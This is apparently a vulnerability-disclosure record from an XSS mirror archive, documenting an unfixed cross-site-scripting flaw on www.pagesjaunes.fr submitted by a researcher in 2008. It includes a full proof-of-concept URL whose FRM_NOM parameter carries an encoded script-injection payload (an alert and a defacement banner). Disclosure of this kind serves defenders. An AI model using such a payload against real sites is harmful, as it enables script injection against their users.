Security researcher xerces, has submitted on 05/11/2008 a cross-site-scripting (XSS) vulnerability affecting www.pagesjaunes.fr, which at the time of submission ranked 665 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/09/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 05/11/2008 |
Date published: 12/09/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: xerces |
Domain: www.pagesjaunes.fr |
Category: XSS |
Pagerank: 665 |
URL: http://www.pagesjaunes.fr/pb.cgi?faire=decode_input_image&DEFAULT_ACTION=bf_inscriptions_req&id_part enaire=fh&lang=fr&srv=PB&site=annuaire_international_du_telephone__codes_postaux&fh=PB_DDB7_F498.js& input_image=&FRM_NOM=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+ xerces%3C%2Fh1%3E%3C%2Fmarquee%3E&FRM_PRENOM=&FRM_ADRESSE=&FRM_LOCALITE=&SAV_LOCALITE=&FRM_DEPARTEME NT=&BF_INSCRIPTIONS_REQ.x=40&BF_INSCRIPTIONS_REQ.y=12 |
Click here to view the mirror
|
|
|